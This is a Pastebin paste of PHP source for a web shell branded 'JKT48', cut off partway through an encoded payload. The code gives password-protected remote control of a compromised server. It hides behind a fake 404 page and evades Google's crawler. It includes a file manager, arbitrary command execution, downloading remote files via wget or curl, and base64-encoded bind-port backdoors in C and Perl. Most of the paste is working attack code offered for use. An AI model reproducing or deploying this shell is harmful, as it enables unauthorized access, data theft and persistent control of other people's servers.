Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

JKT48Hacker

By: a guest on May 14th, 2013  |  syntax: None  |  size: 232.79 KB  |  views: 48  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <?php
  2. /* (Web Shell JKT48 r3c0d3d by Nabilaholic|default pass:" jkt48 ") */
  3. $auth_pass = "3af3b3221714103a593acc24ae213767";
  4. $color = "#00ff00";
  5. $default_action = 'FilesMan';
  6. @define('SELF_PATH', __FILE__);
  7. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  8.     header('HTTP/1.0 404 Not Found');
  9.     exit;
  10. }
  11. @session_start();
  12. @error_reporting(0);
  13. @ini_set('error_log',NULL);
  14. @ini_set('log_errors',0);
  15. @ini_set('max_execution_time',0);
  16. @ini_set('output_buffering',0);
  17. @ini_set('display_errors', 0);
  18. @set_time_limit(0);
  19. @set_magic_quotes_runtime(0);
  20. @define('VERSION', '2.1');
  21. if( get_magic_quotes_gpc() ) {
  22.     function stripslashes_array($array) {
  23.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  24.     }
  25.     $_POST = stripslashes_array($_POST);
  26. }
  27. function printLogin() {
  28.     ?>
  29. <h1>Not Found</h1>
  30. <p>The requested URL was not found on this server.</p>
  31. <hr>
  32. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
  33.     <style>
  34.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  35.     </style>
  36.     <center>
  37.     <form method=post>
  38.     <input type=password name=pass>
  39.     </form></center>
  40.     <?php
  41.     exit;
  42. }
  43. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  44.     if( empty( $auth_pass ) ||
  45.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  46.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  47.     else
  48.         printLogin();
  49.                
  50. @ini_set('log_errors',0);
  51. @ini_set('output_buffering',0);
  52. if(isset($_GET['dl']) && ($_GET['dl'] != "")){
  53.         $file = $_GET['dl'];
  54.         $filez = @file_get_contents($file);
  55.    header("Content-type: application/octet-stream");
  56.    header("Content-length: ".strlen($filez));
  57.    header("Content-disposition: attachment; filename=\"".basename($file)."\";");
  58.    echo $filez;
  59.     exit;
  60. }
  61. elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
  62.         $file = $_GET['dlgzip'];
  63.         $filez = gzencode(@file_get_contents($file));
  64.    header("Content-Type:application/x-gzip\n");
  65.    header("Content-length: ".strlen($filez));
  66.    header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
  67.    echo $filez;
  68.     exit;
  69. }
  70. // view image
  71. if(isset($_GET['img'])){
  72.                 @ob_clean();
  73.                 $d = magicboom($_GET['y']);
  74.                 $f = $_GET['img'];
  75.                 $inf = @getimagesize($d.$f);
  76.                 $ext = explode($f,".");
  77.                 $ext = $ext[count($ext)-1];
  78.                 @header("Content-type: ".$inf["mime"]);
  79.                 @header("Cache-control: public");
  80.                 @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  81.                 @header("Cache-control: max-age=".(60*60*24*7));  
  82.                 @readfile($d.$f);
  83.                 exit;
  84. }
  85.  
  86. // server software
  87. $software = getenv("SERVER_SOFTWARE");
  88. // check safemode
  89. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  $safemode = TRUE; else $safemode = FALSE;
  90. // uname -a
  91. $system = @php_uname();
  92. // mysql
  93. function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}}
  94. function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
  95. function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
  96. function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
  97. function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
  98. // check os
  99. if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
  100. else $win = FALSE;
  101. // change directory
  102. if(isset($_GET['y'])){
  103.         if(@is_dir($_GET['view'])){
  104.                 $pwd = $_GET['view'];
  105.                 @chdir($pwd);
  106.         }
  107.         else{
  108.                 $pwd = $_GET['y'];
  109.                 @chdir($pwd);
  110.         }
  111. }
  112. //hdd
  113. function convertByte($s) {
  114. if($s >= 1073741824)
  115. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  116. elseif($s >= 1048576)
  117. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  118. elseif($s >= 1024)
  119. return sprintf('%1.2f',$s / 1024 ) .' KB';
  120. else
  121. return $s .' B';
  122. }
  123.  
  124. // username, id, shell prompt and working directory
  125. if(!$win){
  126.         if(!$user = rapih(exe("whoami"))) $user = "";
  127.         if(!$id = rapih(exe("id"))) $id = "";
  128.         $prompt = $user." \$ ";
  129.         $pwd = @getcwd().DIRECTORY_SEPARATOR;
  130. }
  131. else {
  132.         $user = @get_current_user();
  133.         $id = $user;
  134.         $prompt = $user." &gt;";
  135.         $pwd = realpath(".")."\\";
  136.         // find drive letters
  137.         $v = explode("\\",$d);
  138.         $v = $v[0];
  139.         foreach (range("A","Z") as $letter)
  140.         {
  141.           $bool = @is_dir($letter.":\\");
  142.           if ($bool)
  143.           {
  144.                   $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
  145.                    if ($letter.":" != $v) {$letters .= $letter;}
  146.                    else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
  147.                    $letters .= " ]</a> ";
  148.           }      
  149.  }
  150. }
  151.  
  152. function testoracle() {
  153.     if (function_exists('ocilogon')) { return showstat("on"); }
  154.     else { return showstat("off"); }
  155.     }
  156.  
  157. function testmssql() {
  158.     if (function_exists('mssql_connect')) { return showstat("on"); }
  159.     else { return showstat("off"); }
  160.     }
  161.  
  162.  function showdisablefunctions() {
  163.     if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }
  164.     else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; }
  165.     }
  166.        
  167. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  168. else $posix = FALSE;
  169. // server ip
  170. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
  171. // your ip ;-)
  172. $my_ip = $_SERVER['REMOTE_ADDR'];
  173. $admin_id=$_SERVER['SERVER_ADMIN'];
  174. $bindport = "13123";
  175. $bindport_pass = "b374k";
  176.  
  177. // separate the working direcotory
  178. $pwds = explode(DIRECTORY_SEPARATOR,$pwd);
  179. $pwdurl = "";
  180. for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
  181.         $pathz = "";
  182.         for($j = 0 ; $j <= $i ; $j++){
  183.                 $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
  184.         }
  185.         $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
  186. }
  187.        
  188. // rename file or folder
  189. if(isset($_POST['rename'])){
  190.         $old = $_POST['oldname'];
  191.         $new = $_POST['newname'];
  192.         @rename($pwd.$old,$pwd.$new);
  193.         $file = $pwd.$new;
  194. }
  195. if(isset($_POST['chmod'])){
  196.         $name = $_POST['name'];
  197.         $value = $_POST['newvalue'];
  198. if (strlen($value)==3){
  199.         $value = 0 . "" . $value;}
  200.         @chmod($pwd.$name,octdec($value));
  201.         $file = $pwd.$name;}
  202.        
  203. if(isset($_POST['chmod_folder'])){
  204.         $name = $_POST['name'];
  205.         $value = $_POST['newvalue'];
  206. if (strlen($value)==3){
  207.         $value = 0 . "" . $value;}
  208.         @chmod($pwd.$name,octdec($value));
  209.         $file = $pwd.$name;}
  210.  
  211.  
  212. // print useful info
  213. $buff  = "Software : <b>".$software."</b><br />";
  214. $buff .= "System OS : <b>".$system."</b><br />";
  215. if($id != "") $buff .= "ID : <b>".$id."</b><br />";
  216. $buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />";
  217. $buff .= "Server ip : <b>".$server_ip."</b> <span class=\"gaya\"> | </span> Your   ip : <b>".$my_ip."</b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />";
  218. $buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";
  219. if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b>ON</b></span><br />";
  220. else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />";
  221. $buff .= "Disabled Functions: ".showdisablefunctions()."<br />";
  222. $buff .= "MySQL: ".testmysql()."&nbsp;|&nbsp;MSSQL: ".testmssql()."&nbsp;|&nbsp;Oracle: ".testoracle()."&nbsp;|&nbsp;Perl: ".testperl()."&nbsp;|&nbsp;cURL: ".testcurl()."&nbsp;|&nbsp;WGet: ".testwget()."<br>";
  223. $buff .= "<font color=00ff00 ><b>".$letters."&nbsp;&gt;&nbsp;".$pwdurl."</b></font>";
  224.  
  225.  
  226.  
  227.  
  228. function rapih($text){
  229.         return trim(str_replace("<br />","",$text));
  230. }
  231.  
  232. function magicboom($text){
  233.         if (!get_magic_quotes_gpc()) {
  234.                  return $text;
  235.         }
  236.         return stripslashes($text);
  237. }
  238.  
  239. function showdir($pwd,$prompt){
  240.         $fname = array();
  241.         $dname = array();
  242.         if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  243.         else $posix = FALSE;
  244.         $user = "????:????";
  245.         if($dh = @scandir($pwd)){
  246.                 foreach($dh as $file){
  247.                         if(is_dir($file)){
  248.                                 $dname[] = $file;
  249.                         }
  250.                         elseif(is_file($file)){
  251.                                 $fname[] = $file;
  252.                         }
  253.                 }
  254.         }
  255.         else{
  256.                 if($dh = @opendir($pwd)){
  257.                         while($file = @readdir($dh)){
  258.                                 if(@is_dir($file)){
  259.                                         $dname[] = $file;
  260.                                 }
  261.                                 elseif(@is_file($file)){
  262.                                         $fname[] = $file;
  263.                                 }
  264.                         }
  265.                         @closedir($dh);
  266.                 }
  267.         }
  268.  
  269.        
  270.         sort($fname);
  271.         sort($dname);
  272.         $path = @explode(DIRECTORY_SEPARATOR,$pwd);
  273.         $tree = @sizeof($path);
  274.         $parent = "";
  275.         $buff = "
  276.         <form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
  277.         <table class=\"cmdbox\" style=\"width:50%;\">
  278.         <tr><td><b>$prompt</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
  279.         </form>
  280.         <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
  281.         <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  282.         <tr><td><b>view file/folder</b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
  283.         </form></table><table class=\"explore\">
  284.         <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
  285.         ";
  286.         if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
  287.         else $parent = $pwd;  
  288.  
  289.         foreach($dname as $folder){
  290.                 if($folder == ".") {
  291.                         if(!$win && $posix){
  292.                                 $name=@posix_getpwuid(@fileowner($folder));
  293.                                 $group=@posix_getgrgid(@filegroup($folder));
  294.                                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  295.                         }
  296.                         else {
  297.                                 $owner = $user;
  298.                         }
  299.                         $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
  300.                         <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
  301.                         <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
  302.                         <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
  303.                         <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  304.                         <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  305.                         <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  306.                         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  307.                         </form></td>
  308.                        
  309.                         </tr>
  310.                         ";
  311.                 }
  312.                 elseif($folder == "..") {
  313.                         if(!$win && $posix){
  314.                                 $name=@posix_getpwuid(@fileowner($folder));
  315.                                 $group=@posix_getgrgid(@filegroup($folder));
  316.                                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  317.                         }
  318.                         else {
  319.                                 $owner = $user;
  320.                         }
  321.                         $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'>   $folder</a></td><td>LINK</td>
  322.                         <td style=\"text-align:center;\">".$owner."</td>
  323.                         <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
  324.                         <td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
  325.                         <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  326.                         <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  327.                         <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  328.                         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  329.                         </form>
  330.                         </td></tr>";
  331.                 }
  332.                 else {
  333.                         if(!$win && $posix){
  334.                                 $name=@posix_getpwuid(@fileowner($folder));
  335.                                 $group=@posix_getgrgid(@filegroup($folder));
  336.                                 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  337.                         }
  338.                         else {
  339.                                 $owner = $user;
  340.                         }
  341.                         $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' />     [ $folder ]</b></a>
  342.                         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  343.                         <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  344.                         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  345.                         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  346.                         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
  347.                         </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
  348.                         <td><center>
  349.                         <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
  350.                         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  351.                         <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  352.                         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
  353.                         <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
  354.                         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  355.                         onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
  356.                         <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a></td></tr>";
  357.                 }
  358.         }
  359.  
  360.         foreach($fname as $file){
  361.                 $full = $pwd.$file;
  362.                 if(!$win && $posix){
  363.                         $name=@posix_getpwuid(@fileowner($folder));
  364.                         $group=@posix_getgrgid(@filegroup($folder));
  365.                         $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  366.                 }
  367.                 else {
  368.                         $owner = $user;
  369.                 }              
  370.                 $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' />   $file</b></a>
  371.                 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  372.                 <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  373.                 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
  374.                 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  375.                 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
  376.                 </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
  377.                 <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
  378.                 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  379. <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  380. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
  381. <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
  382. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
  383.                 <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
  384.                 <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$full\">delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>";
  385.         }
  386.         $buff .= "</table>";
  387.         return $buff;
  388. }
  389.  
  390. function ukuran($file){
  391.         if($size = @filesize($file)){
  392.                 if($size <= 1024) return $size;
  393.                 else{
  394.                         if($size <= 1024*1024) {
  395.                                 $size = @round($size / 1024,2);;
  396.                                 return "$size kb";
  397.                         }
  398.                         else {
  399.                                 $size = @round($size / 1024 / 1024,2);
  400.                                 return "$size mb";     
  401.                         }
  402.                 }
  403.         }
  404.         else return "???";
  405. }
  406.  
  407. function exe($cmd){
  408.         if(function_exists('system')) {
  409.                 @ob_start();
  410.                 @system($cmd);
  411.                 $buff = @ob_get_contents();
  412.                 @ob_end_clean();
  413.                 return $buff;
  414.         }
  415.         elseif(function_exists('exec')) {
  416.                 @exec($cmd,$results);
  417.                 $buff = "";
  418.                 foreach($results as $result){
  419.                         $buff .= $result;
  420.                 }
  421.                 return $buff;
  422.         }
  423.         elseif(function_exists('passthru')) {
  424.                 @ob_start();
  425.                 @passthru($cmd);
  426.                 $buff = @ob_get_contents();
  427.                 @ob_end_clean();
  428.                 return $buff;
  429.         }
  430.         elseif(function_exists('shell_exec')){
  431.                 $buff = @shell_exec($cmd);
  432.                 return $buff;
  433.         }
  434. }
  435.  
  436. function tulis($file,$text){
  437.         $textz = gzinflate(base64_decode($text));
  438.          if($filez = @fopen($file,"w"))
  439.          {
  440.                  @fputs($filez,$textz);
  441.                  @fclose($file);
  442.          }
  443. }
  444.  
  445. function ambil($link,$file) {
  446.    if($fp = @fopen($link,"r")){
  447.            while(!feof($fp)) {
  448.                     $cont.= @fread($fp,1024);
  449.                 }
  450.                 @fclose($fp);
  451.            $fp2 = @fopen($file,"w");
  452.            @fwrite($fp2,$cont);
  453.            @fclose($fp2);
  454.    }
  455. }
  456.  
  457. function which($pr){
  458.         $path = exe("which $pr");
  459.         if(!empty($path)) { return trim($path); } else { return trim($pr); }
  460. }
  461.  
  462. function download($cmd,$url){
  463.         $namafile = basename($url);
  464.         switch($cmd) {
  465.                 case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
  466.                 case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
  467.                 case 'wfread' : ambil($wurl,$namafile);break;
  468.                 case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
  469.                 case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
  470.                 case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
  471.                 case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
  472.                 default: break;
  473.         }
  474.         return $namafile;
  475. }
  476.  
  477. function get_perms($file)
  478. {
  479.         if($mode=@fileperms($file)){
  480.                 $perms=';
  481.                 $perms .= ($mode & 00400) ? 'r' : '-';
  482.                 $perms .= ($mode & 00200) ? 'w' : '-';
  483.                 $perms .= ($mode & 00100) ? 'x' : '-';
  484.                 $perms .= ($mode & 00040) ? 'r' : '-';
  485.                 $perms .= ($mode & 00020) ? 'w' : '-';
  486.                 $perms .= ($mode & 00010) ? 'x' : '-';
  487.                 $perms .= ($mode & 00004) ? 'r' : '-';
  488.                 $perms .= ($mode & 00002) ? 'w' : '-';
  489.                 $perms .= ($mode & 00001) ? 'x' : '-';
  490.                 return $perms;
  491.         }
  492.         else return "??????????";
  493. }
  494.  
  495. function clearspace($text){
  496.         return str_replace(" ","_",$text);
  497. }
  498.  
  499. // net tools
  500. $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf
  501. +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE
  502. P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ
  503. dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
  504. 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug
  505. Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
  506. HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W
  507. tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
  508. ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
  509. uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
  510. $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
  511. NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg
  512. tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
  513. e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0
  514. LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
